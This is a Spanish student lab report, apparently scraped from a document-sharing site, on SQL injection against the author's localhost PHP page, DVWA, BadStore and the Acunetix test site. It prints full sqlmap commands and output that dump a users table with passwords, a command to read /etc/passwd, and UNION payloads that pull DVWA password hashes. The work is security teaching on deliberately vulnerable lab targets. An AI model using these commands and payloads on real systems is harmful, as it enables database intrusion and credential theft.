SQL Injection 2

SQL Injection 2 Map Índice 1. A) Ataque Local......................................................................

Views 425 Downloads 12 File size 527KB

Report DMCA / Copyright

DOWNLOAD FILE

Recommend stories
SQL INJECTION
SQL INJECTION

72 2 540KB Read more

SQL Injection
SQL Injection

20 0 2MB Read more

SQL Injection Dorks
SQL Injection Dorks

Huge Sql injection Dork list By Hack w0rm www.hackw0rm.blogspot.com inurl:index.php?id= inurl:trainers.php?id= inurl:bu

7,554 3 20KB Read more

Dorks Para SQL Injection
Dorks Para SQL Injection

DORKS: inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=

174 2 14KB Read more

Ataques SQL Injection
Ataques SQL Injection

124 3 1MB Read more

SQL Injection Desde Cero
SQL Injection Desde Cero

157 0 415KB Read more

Informe Hacking Etico - SQL Injection
Informe Hacking Etico - SQL Injection

77 4 554KB Read more

Tutorial SQL Injection by Lun4t1c0
Tutorial SQL Injection by Lun4t1c0

201 0 200KB Read more

Practica SQL Injection en DVWA
Practica SQL Injection en DVWA

59 1 760KB Read more

Hack x Crack SQL Injection
Hack x Crack SQL Injection

104 1 1MB Read more

Citation preview

SQL

Injection 2

Map

Índice 1. A)

Ataque Local..............................................................................................................3 Servidor de BD y Versión ..................................................................................3

B) Nombre de la BD......................................................................................................5 C)

Tablas: ........................................................................................................................6

D)

Columnas: ................................................................................................................7

E)

Contenido de la Tabla:............................................................................................8

F)

Resto de Bases de Datos: .....................................................................................9

G)

Usuarios de MySQL: ......................................................................................... 10

2.

DVWA ....................................................................................................................... 12

Installation .......................................................................................................................... 12 3. A)

BadStore .................................................................................................................. 17 Servidor de BD y Versión ................................................................................ 17

B) Nombre de la BD.................................................................................................... 19 C)

Tablas........................................................................................................................ 20

D)

Columnas ............................................................................................................... 21

E)

Resto de BBDD ....................................................................................................... 22

4. A)

Acunetix.................................................................................................................... 23 Servidor de BD y Versión ................................................................................ 23

B) Nombre de la BD.................................................................................................... 25 C)

Tablas........................................................................................................................ 26

D)

Columnas ............................................................................................................... 27

Iván Martín Valderas

Página 2

SQL Injection

1. Ataque Local Vamos a realizar un ataque de SQL injection a nuestra página anterior con la cual hacíamos una consulta a nuestra base de datos de MySQL. Su localización es: http://localhost/ejerPHP/SQL_Injection/consulta.php Para ello utilizaremos el programa SQLMap desde la consola.

A) Servidor de BD y Versión

Primero vamos a averiguar el tipo de servidor de Base de Datos y su versión, para ello utilizaremos la opción –b de sqlmap:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 -b sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:57:25 [13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [13:57:26] [INFO] testing connection to the target url [13:57:26] [INFO] testing if the url is stable, wait a few seconds [13:57:27] [INFO] url is stable [13:57:27] [INFO] testing if GET parameter 'id' is dynamic [13:57:27] [INFO] confirming that GET parameter 'id' is dynamic [13:57:27] [INFO] GET parameter 'id' is dynamic [13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be i njectable [13:57:28] [INFO] testing sql injection on GET parameter 'id' [13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI NG clause' injectable [13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries' [13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable [13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [13:57:38] [INFO] target url appears to be UNION injectable with 3 columns [13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu mns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y sqlmap identified the following injection points with a total of 29 HTTP(s) requests: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[13:57:44] [INFO] the back-end DBMS is MySQL [13:57:44] [INFO] fetching banner web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 banner: '5.5.8' [13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 13:57:44

En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo de servidor: […] 'MySQL > 5.0.11 'PostgreSQL > 8.1 'Microsoft SQL Server

[…]

Tras realizar las operaciones, encontramos la versión: MySQL 5.0.11

Iván Martín Valderas

Página 4

SQL Injection

B) Nombre de la BD

Éste es el primer paso para sacar toda la información que podamos de nuestra víctima ya que a partir de aquí iremos pasa a paso entrando más a fondo en la BD. Sacamos el nombre de la Base de Datos a la que se refiere la consulta que hemos realizado, es decir la base de datos actual, con el comando: --current-db

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:01:02 [14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:01:02] [INFO] resuming injection data from session file [14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:01:02] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:01:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:01:03] [INFO] fetching current database

current database: 'asir1' [14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:01:03

El nombre de la Base de Datos es “asir1”

C) Tablas: Una vez obtenido el nombre de la Base de Datos, ya podemos proceder a ver las tablas que ésta posee, mediante el comando --tables indicando –D asir1 para el nombre que hemos obtenido antes:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --tables -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:04:48 [14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:04:48] [INFO] resuming injection data from session file [14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:04:48] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:04:49] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:04:49] [INFO] fetching tables for database 'asir1' [14:04:49] [INFO] the SQL query used returns 1 entries

Database: asir1 [1 table] +----------+ | usuarios | +----------+ [14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:04:49

Obtenemos una tabla: usuarios

Iván Martín Valderas

Página 6

SQL Injection

D) Columnas:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --columns -T usuarios -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:06:30 [14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:06:30] [INFO] resuming injection data from session file [14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:06:30] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:06:31] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1' [14:06:31] [INFO] the SQL query used returns 3 entries

Database: asir1 Table: usuarios [3 columns] +--------------+-------------------------+ | Column | Type | +--------------+-------------------------+ | id | int(10) unsigned | | nonmbre | varchar(50) | | password | varchar(50) | +----------+-----------------------------+ [14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:06:31

Hemos obtenido los nombres de las columnas y su tipo

E) Contenido de la Tabla:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --dump -T usuarios -D asir1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:07:28 [14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:07:28] [INFO] resuming injection data from session file [14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:07:28] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:07:28] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1' [14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session' : id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50) [14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1' [14:07:29] [INFO] the SQL query used returns 3 entries

Database: asir1 Table: usuarios [3 entries] +----+---------+----------+ | id | nonmbre | password | +----+---------+----------+ | 2 | ivan | ivanasir | | 3 | luci | luciasir | | 1 | root | asir2012 | +----+---------+----------+ Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa Iván Martín Valderas

Página 8

SQL Injection

F) Resto de Bases de Datos:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --dbs sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:08:22 [14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:08:22] [INFO] resuming injection data from session file [14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:08:22] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:08:22] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:08:22] [INFO] fetching database names [14:08:22] [INFO] the SQL query used returns 8 entries

available databases [8]: [*] asir1 [*] cdcol [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] webauth

G) Usuarios de MySQL:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --users sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 14:10:03 [14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as sessi on file [14:10:03] [INFO] resuming injection data from session file [14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [14:10:03] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) --[14:10:03] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.5, Apache 2.2.17 back-end DBMS: MySQL 5.0.11 [14:10:03] [INFO] fetching database users [14:10:03] [INFO] the SQL query used returns 58 entries

database management system users [4]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost'

Iván Martín Valderas

Página 10

SQL Injection

Sólo existe un usuario root. Aquí está uno de los problemas. Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP. Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que podemos hacer llamadas al sistema:

Así podríamos saber las contraseñas usadas, por ejemplo en UNIX:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consult a.php?id=1 --read-file /etc/passwd

2. DVWA

Damn Vulnerable Web App [[La carpeta debe estar en htdocs]]

Installation Default username = admin Default password = password

Para accede, debemos escribir en nuestro explorador: http://127.0.0.1/dvwa/

Creamos la Base de Datos

Iván Martín Valderas

Página 12

SQL Injection

Comprobamos la existencia de la vulnerabilidad:

1' or '1'='1' union select password, first_name from users where first_name='admin

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: admin

http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA

Iván Martín Valderas

Página 14

SQL Injection

Hemos obtenido una contraseña, aunque como vemos está codificada, vamos a utilizar una utilidad web para decodificarla:

Probamos a sacar todas las contraseñas a la vez, ya que con el anterior código deberíamos hacerlo 1 a 1:

1' or '1'='1' union select first_name, password from users where '1'='1

Iván Martín Valderas

Página 16

SQL Injection

3. BadStore

Si en el campo search escribimos una comilla doble (“) nos encontramos con una respuesta del servidor SQL, por lo que podemos prever la vulneravilidad SQL

Al igual que con la primera práctica, vamos a seguir los pasos

A) Servidor de BD y Versión

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" -b

sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:02:41 [10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:02:41] [INFO] testing connection to the target url [10:02:41] [INFO] testing if the url is stable, wait a few seconds [10:02:42] [INFO] url is stable [10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic [10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic [10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL) [10:02:43] [INFO] testing sql injection on GET parameter 'searchquery' [10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan t to skip test payloads specific for other DBMSes? [Y/n] y [10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:02:57] [INFO] target url appears to be UNION injectable with 4 columns [10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 t o 10 columns' injectable

GET parameter 'searchquery' is vulnerable. Do you want to keep testing the other s? [y/N] y Aquí nos ha avisado de que el parámetro ‘searchquery’ es vulnerable, es decir, la caja de búsqueda donde antes insertamos las comillas dobles (“) posee un GET que nos permitirá insertar ahí sentencias SQL, nos pregunta además si queremos buscar otros parámetros vulnerables. [10:03:05] [INFO] testing if GET parameter 'action' is dynamic [10:03:05] [INFO] confirming that GET parameter 'action' is dynamic [10:03:05] [INFO] GET parameter 'action' is dynamic [10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable [10:03:05] [INFO] testing sql injection on GET parameter 'action' [10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:17] [WARNING] GET parameter 'action' is not injectable [10:03:17] [INFO] testing if GET parameter 'x' is dynamic [10:03:17] [WARNING] GET parameter 'x' is not dynamic [10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be in jectable [10:03:17] [INFO] testing sql injection on GET parameter 'x' [10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:31] [WARNING] GET parameter 'x' is not injectable [10:03:31] [INFO] testing if GET parameter 'y' is dynamic [10:03:31] [WARNING] GET parameter 'y' is not dynamic [10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be in jectable [10:03:31] [INFO] testing sql injection on GET parameter 'y' [10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:44] [WARNING] GET parameter 'y' is not injectable sqlmap identified the following injection points with a total of 380 HTTP(s) req uests: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0

Iván Martín Valderas

Página 18

SQL Injection --[10:03:45] [INFO] testing MySQL [10:03:45] [INFO] confirming MySQL [10:03:45] [INFO] the back-end DBMS is MySQL [10:03:45] [INFO] fetching banner web application technology: Apache 1.3.28

back-end DBMS: MySQL < 5.0.0 banner: '4.1.7-standard' [10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:03:45

B) Nombre de la BD C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:12:35 [10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:12:35] [INFO] resuming injection data from session file [10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:12:35] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:12:35] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:12:35] [INFO] fetching current database

current database: 'badstoredb' [10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:12:36

El nombre de la BD es badstoredb

C) Tablas C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --tables -D badstoredb sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:20:13 [10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:20:13] [INFO] resuming injection data from session file [10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:20:13] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:20:14] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common table existance check? [Y/n/q] y [10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlma p\txt\common-tables.txt' [10:20:21] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] [10:20:28] [WARNING] running in a single-thread mode. This could take a while. [10:27:14] [INFO] retrieved: itemdb

Database: badstoredb [1 table] +--------+ | itemdb | +--------+ [10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:27:14

El nombre de la tabla es itemdb

Iván Martín Valderas

Página 20

SQL Injection

D) Columnas C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:29:00 [10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:29:00] [INFO] resuming injection data from session file [10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file [10:29:00] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:29:00] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common columns existance check? [Y/n/q] y [10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlm ap\txt\common-columns.txt' please enter number of threads? [Enter for 1 (current)] [10:29:05] [WARNING] running in a single-thread mode. This could take a while. [10:29:36] [INFO] retrieved: price [10:29:55] [INFO] retrieved: qty

Database: badstoredb Table: itemdb [2 columns] +--------+---------+ | Column | Type | +--------+---------+ | price | numeric | | qty | numeric | +--------+---------+ [10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164'

[*] shutting down at: 10:34:18

E) Resto de BBDD Como podemos haber visto, no hay ninguna tabla llamada usuarios ni nada por el estilo, sólo se encuentra la tabla de los productos por lo que de esta manera no podemos sacar ni usuarios ni contraseñas, vamos a comprobar entonces otras bases de datos:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --dbs sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:36:17 [10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:36:17] [INFO] resuming injection data from session file [10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file [10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' f rom session file [10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' fro m session file [10:36:17] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:36:18] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database [10:36:18] [INFO] fetching database names [10:36:18] [INFO] fetching number of databases [10:36:18] [ERROR] unable to retrieve the number of databases [10:36:18] [INFO] falling back to current database [10:36:18] [INFO] fetching current database [10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\ses

sion': badstoredb available databases [1]: [*] badstoredb [10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164' [*] shutting down at: 10:36:18

Iván Martín Valderas

Página 22

SQL Injection

4. Acunetix

Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la url nos aparece ?cat=1, es un indicio para comprobar. http://testphp.vulnweb.com/listproducts.php?cat=1

